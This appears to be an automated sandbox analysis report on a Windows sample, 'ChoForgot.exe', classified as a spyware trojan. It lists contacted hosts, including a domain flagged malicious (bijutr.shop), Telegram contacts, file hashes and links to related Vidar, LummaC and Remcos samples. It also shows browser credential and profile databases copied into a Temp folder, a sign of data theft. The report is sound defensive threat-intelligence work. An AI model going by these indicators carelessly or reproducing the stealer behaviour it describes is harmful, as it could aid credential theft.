                                                                                                                                                                            https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://ogs.googchrome.exe, 00000011.00000002.2637677215.000047E4000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/5371chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://anglebug.com/4722chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640537830.000047E400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000011.00000003.2552340537.000047E4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.google.com/chrome/tips/gspHchrome.exe, 00000011.00000002.2640506644.000047E40072C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://developer.chrome.com/extensions/external_extensions.html)chrome.exe, 00000011.00000002.2637619690.000047E4000EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2644300769.000047E400FF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://chromewebstore.google.com/msedge.exe, 00000014.00000002.2776605861.00005B800237C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.22.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://drive-preprod.corp.google.com/chrome.exe, 00000011.00000003.2553573276.000047E4004B0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://anglebug.com/7279Qchrome.exe, 00000011.00000002.2641961362.000047E400AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://clients4.google.com/chrome-syncchrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000014.00000003.2700592502.00005B8002464000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700730195.00005B800246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2700974412.00005B8002470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/6692chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://issuetracker.google.com/258207403chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://anglebug.com/3502chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://anglebug.com/3623chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/3625chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://anglebug.com/3624chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://docs.google.com/presentation/Jchrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://bijutr.shop936ed13bd870Wb.com, 0000000C.00000002.3028437270.00000000004AD000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://t.mWb.com, 0000000C.00000003.2354835954.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2355039530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354815842.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Wb.com, 0000000C.00000003.2354749747.0000000001C70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://anglebug.com/5007chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640417345.000047E4006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638868900.000047E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://anglebug.com/3862chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559467114.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564039810.000047E40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2556314289.000047E40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2560291355.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2556474234.000047E400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2565321356.000047E400C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2558088225.000047E400D80000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.19.225 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
108.139.47.50 | unknown | United States | 16509 | AMAZON-02US | false
162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.217.21.36 | www.google.com | United States | 15169 | GOOGLEUS | false
20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
188.245.216.205 | bijutr.shop | Iran (ISLAMIC Republic Of) | 16322 | PARSONLINETehran-IRANIR | true
204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
104.70.121.51 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
51.104.15.253 | unknown | United Kingdom | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
3.160.188.50 | sb.scorecardresearch.com | United States | 16509 | AMAZON-02US | false
23.219.82.25 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false

IP
192.168.2.6
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579962
Start date and time: 2024-12-23 17:13:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ChoForgot.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@95/287@27/16
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 79
• Number of non-executed functions: 296
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ChoForgot.exe
Time | Type | Description
11:13:57 | API Interceptor | 1x Sleep call for process: ChoForgot.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
108.139.47.50 | QIo3SytSZA.exe | malicious | Vidar
108.139.47.50 | T0x859fNfn.exe | malicious | Vidar
108.139.47.50 | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar
108.139.47.50 | file.exe | malicious | Stealc, Vidar
108.139.47.50 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
108.139.47.50 | https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5nc | malicious | Unknown
108.139.47.50 | http://www.sdmts.com/business-center/for-hire-vehicle-administration&c=E,1,pc5oom8YsW1RqHtANaUTLgMvd2z37r_4n-NR90jlF12Z7NyUKYXr1sKmCXY3dgMIENHwNl8jxylzX2garHrVx3wU2gE5fuDMBydZQ2COLEQJ&typo=1 | malicious | Unknown
108.139.47.50 | https://blyocelectric.com/4xmaf95qR5m4wJYw4 | malicious | Unknown
108.139.47.50 | https://xfv.pages.dev/robots.txt | malicious | HTMLPhisher
108.139.47.50 | https://jfb.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword | malicious | HTMLPhisher
162.159.61.3 | gVKsiQIHqe.exe | malicious | Vidar
162.159.61.3 | trZG6pItZj.exe | malicious | Vidar
                                                                                                                                                                                                                                                                  Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                  149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                                  http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                                  http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                                  http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                                                  http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  • telegram.dog/
                                                                                                                                                                                                                                                                                  LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                                                                  jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\Users\user\AppData\Local\Temp\623615\Wb.com
Associated Sample Name / URL | Detection | Threat Name
94e.exe | malicious | Remcos
94e.exe | malicious | Remcos
0442.pdf.exe | malicious | Remcos
acronis recovery expert deluxe 1.0.0.132.rarl.exe | malicious | LummaC
trZG6pItZj.exe | malicious | Vidar
9EI7wrGs4K.exe | malicious | Vidar
Wine.exe | malicious | LummaC
Setup.exe | malicious | LummaC
GoldenContinent.exe | malicious | Vidar
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
Process: C:\Users\user\AppData\Local\Temp\623615\Wb.com
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 159744
Entropy (8bit): 0.5394293526345721
Encrypted: false
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\623615\Wb.com
File Type: SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 98304
Entropy (8bit): 0.08235737944063153
Encrypted: false
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\623615\Wb.com
File Type: ASCII text, with very long lines (1717), with CRLF line terminators
Category: dropped
Size (bytes): 10237
Entropy (8bit): 5.498288591230544
Encrypted: false
Malicious: false
Preview: // Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
Process: C:\Users\user\AppData\Local\Temp\623615\Wb.com
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 155648
Entropy (8bit): 0.5407252242845243
Encrypted: false
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\623615\Wb.com
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
Malicious: false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2680313905361795
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:L/2qOB1nxCkMzSA1LyKOMq+8iP5GDHP/0jMVumS:Kq+n0Jz91LyKOMq+8iP5GLP/0/
                                                                                                                                                                                                                                                                                                      MD5:1E7C2DB97171FF0366B78CC79317B690
                                                                                                                                                                                                                                                                                                      SHA1:1A034AAF870E7D3ACE3051AAFD8F6736B7AF3F29
                                                                                                                                                                                                                                                                                                      SHA-256:F7D2FACFD87176E929C54AFE4CE8DED5AB19E6738B5E0E8F2E74F121D99A8457
                                                                                                                                                                                                                                                                                                      SHA-512:00AA475FE9A196AD35FD83C090AD16B64B31728073CE149CCF45111446DDB18764F7997BD269C37CEC2F9CA7067094722C44594D2A547349398CA0F3D488E2CA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):294912
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08436837154972243
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v2:51zkVmvQhyn+Zoz67f
                                                                                                                                                                                                                                                                                                      MD5:BDDB3A7A4643B027E8E743D32B86297D
                                                                                                                                                                                                                                                                                                      SHA1:AACAA39E60FB34908241F75550B1CEDDA50E37D1
                                                                                                                                                                                                                                                                                                      SHA-256:13BC4A6A15651C116209341E97255C67980005927DFD9E91236E2E1517AF97EF
                                                                                                                                                                                                                                                                                                      SHA-512:9A6244248CA636DB12AEC2E56DEAEAA2D62ED8378EA5A1D9947938DA15CA66BC4EDF11BF7CCC92E43734449EBECD03CF538BB61FCF90798DEBFD65098BC2A444
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):45940
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.087002792247592
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:FMkbJrT8IeQc5dK0S0i1zNtZBcXOX9JVLvzrrvcnlo7wCiozJDSgzMMd6qD47u3U:FMk1rT8H1KJH2nlokFoztSmd6qE7R
                                                                                                                                                                                                                                                                                                      MD5:0AED5D79F5CB348DF93D164A744B62D5
                                                                                                                                                                                                                                                                                                      SHA1:C48199CC74F9D8AD1DC226F2D9BBB3ED34917F90
                                                                                                                                                                                                                                                                                                      SHA-256:E8A04BE8F1B8D0E808FA560BAA7EA97C15C3131329FB7FCAD6ADC6E7C1640824
                                                                                                                                                                                                                                                                                                      SHA-512:F0727C36B8F3198BB944ED83BB26495451CDF8B26F5D5AE258C077B8146DD77E7714EF83780DB09C345A4508FF9EBDBA84D5EA5B76FFEDA1CA5E68CD4E779887
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):45987
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.08682737200293
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:FMkbJrT8IeQc5dK0U0i1zNtZBcXOX9JVLvzrrvcnlo7wCiozJDSgzMMd6qD47u3U:FMk1rT8H1KdH2nlokFoztSmd6qE7R
                                                                                                                                                                                                                                                                                                      MD5:00DBB87EAA0B699B64F43167C8F709DF
                                                                                                                                                                                                                                                                                                      SHA1:6795B668833038E903CEF6A7CF300F6EF142AB74
                                                                                                                                                                                                                                                                                                      SHA-256:EC4327CF3B164943BAA8E5BAAFB8EFABBAC8577C0D71C535606041ADBF8EF0B9
                                                                                                                                                                                                                                                                                                      SHA-512:21FDFBC6B6FEF55DC2DCD8A54BD8A33CEF8AD3368410B0621BB6EF1CA3290DD2F2CC8C3B6F54C76F1220E522886516FF5D83E8572F47A859F27B9C4FA300BD8F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):44906
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095173444193261
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWxxi1zNtZBcXOXNgTUpMEKKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynjHIKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:AD32AACEA077E67947B5830B4160C8CC
                                                                                                                                                                                                                                                                                                      SHA1:63B9074DCD270880F7F6E2D1316FA6BE79EBC276
                                                                                                                                                                                                                                                                                                      SHA-256:DAF1481B5613D836F7391FAF2D1615628E02605E3054320446D6518BB2793D6D
                                                                                                                                                                                                                                                                                                      SHA-512:A82D04B4ADF09C3A505AC74A42173BEC13522427E89017040227EC062ADBBD27210B0A1600E1C2A2A7FEF431593CB17B51CA99ACE958580601176ED2F27BD85C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44987
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095426116869297
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWaxi1zNtZBcXOX9JVLvzrrvcKJDSgzMMd6qD47u3+7:+/Ps+wsI7yOgH2KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:BD7424BA3695067F59173201F6791F11
                                                                                                                                                                                                                                                                                                      SHA1:1212EA7BD5D0C188FE436A5788BEED12C9FD1789
                                                                                                                                                                                                                                                                                                      SHA-256:8BA7E8EE5BFFA345DAA4159929C1A280F246D877A9D6BDD2092872866AEA6BE8
                                                                                                                                                                                                                                                                                                      SHA-512:C671524FBD9D36E23F03415BAB6375F5B03322EB0D58D55A2F812733660A56983299E964401F51D8603198CD7D2FC8F3F3C738DA673AEA7145EFAA7D30D18D70
